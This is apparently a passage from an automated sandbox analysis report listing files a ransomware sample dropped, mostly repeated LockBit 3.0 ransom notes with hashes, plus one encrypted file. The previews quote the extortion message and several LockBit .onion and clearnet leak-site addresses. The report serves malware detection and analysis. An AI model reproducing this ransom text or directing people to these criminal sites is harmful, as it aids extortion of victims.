                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.978621049743492
                Encrypted:false
                SSDEEP:192:Ovnefbq4LeBNWJ7nHHrXRtH1/w/OoZiQvPhbeio:wd4LeB87njRtH1bNwU
                MD5:540654172D48936AF2AD4BDDD49B57E4
                SHA1:E7A3C04DDE0CF14CA0471BEDDA3915284F507AE1
                SHA-256:FDF1DFDB08C0C1B79E19467F386DD53D61B9AE5FFEF8F1C2D0F9DA331C3F0054
                SHA-512:C849659C922B2E814520D3CC30FEFFE13EEF1A5D940DA7E9CAEAA4F802F57D071ECAB0859A4F2AE533ACD6E3031D647CF388E4AA7C4E667BF9626E2981EA5F27
                Malicious:false
                Preview:.0..;.........:..i..O...9..B.`UIx..#..C.P..g.I......O.....N........ .(0..|/s..-.h(..mb.|x.....k<.eu..52.|.HE.a.CsZ8..i...s..8...zB..`.>....>z<.'..1L_.>'}.......1n....X.. u...p..;....%.g]^.3.bM@.s...w....l.....<.W%.l..s..[i6[........ ...]o1..Y.<I.6.N.....6I....-..u...?1.."R..Yl..6...].r4T.....;./.......+*3..v..,f...w.GnK...........c.`.zk.?D....R/.....5.....K.....Q.>B.)...C...=F.C.G..........uP..8.kE...<.t.kH.".&.O{....O.A_W.e...n...{.6..^.....TfR U..R.Zj`.O...u..\...R.,..\e.h=.....,..9.x.$n>..Fc9....9.zO.Z[.w.;B...I.0.gL?<.f._./.p.......*+#..b!.....~.E.7n.I.%).{.q`_.lB\g.....a@d{..........@..j?.^.....T..nE>.4?(x.....6]P...`]..oIH...V'F7...M...z..p.J....r...#9.h.bI...v..H..|f.~..5 .....V.z.h.[4.....{a...\?...p.......[U.'."..n1.:....{#..`r.nr.......x.2`.8.....+l.6..i.;.O..g/..)..qT.W..^m?P.r)...0......AAcs.5.bUJ.n0E.......-r.Z.?.....pT...d...r.../...8.A...,"..h.I/JPE..............B..{.yxUG.Ty6..MAy...P..P ...7..SEy.j.v....s...@

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.1.6_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
